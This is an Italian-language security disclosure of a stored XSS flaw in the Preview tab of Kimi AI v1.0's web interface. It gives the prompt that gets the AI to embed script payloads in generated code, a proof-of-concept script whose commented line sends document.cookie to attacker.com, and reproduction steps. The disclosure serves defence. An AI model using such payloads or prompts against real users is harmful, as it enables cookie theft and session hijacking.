
Divulgazione dettagliata di una vulnerabilità XSS persistente nella scheda Anteprima di Kimi AI v1.0, con scenario di attacco, PoC e indicazioni di remediation per i ricercatori di sicurezza.
Una vulnerabilità di Cross-Site Scripting (XSS) è presente nella funzionalità 'Preview' dell'interfaccia web di Kimi AI v1.0. L'applicazione non riesce a sanificare o codificare correttamente i payload HTML/JavaScript generati dal modello AI. Quando un utente passa alla scheda 'Preview' per visualizzare il codice generato dall'AI, il payload dannoso viene renderizzato direttamente nel DOM, consentendo l'esecuzione di JavaScript arbitrario nella sessione del browser della vittima.
Mustafa Hameed
La vulnerabilità può essere sfruttata chiedendo all'AI di generare uno strumento o uno script di sicurezza (ad esempio, uno scanner XSS automatico simile a XSStrike) che contenga payload integrati. L'AI genera il codice sorgente dell'applicazione richiesta ma incorpora il payload dannoso all'interno della struttura HTML/JavaScript. Quando la vittima passa alla scheda 'Preview' per testare o visualizzare lo strumento generato, il payload dannoso incorporato bypassa la sanificazione e viene eseguito immediatamente.
"Crea un semplice strumento di scansione XSS basato sul web simile a XSStrike. Includi un'interfaccia con un elenco di payload per la scansione."
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
1.Accedi alla piattaforma web di Kimi AI.
2.Fornisci il prompt richiedendo la creazione di uno strumento (come il clone di XSStrike) contenente il codice dello scanner.
3.Attendi che il modello AI generi completamente la risposta con il codice.
4.Fai clic sulla scheda 'Preview' nell'interfaccia di chat per visualizzare l'applicazione renderizzata.
5.L'applicazione non riesce a filtrare il contesto JavaScript all'interno del contenitore di anteprima, provocando l'esecuzione immediata dello script nel browser della vittima.
Di seguito è riportato lo screenshot che dimostra l'esecuzione riuscita del payload XSS. Il JavaScript dannoso viene attivato immediatamente quando si passa alla scheda 'Preview':
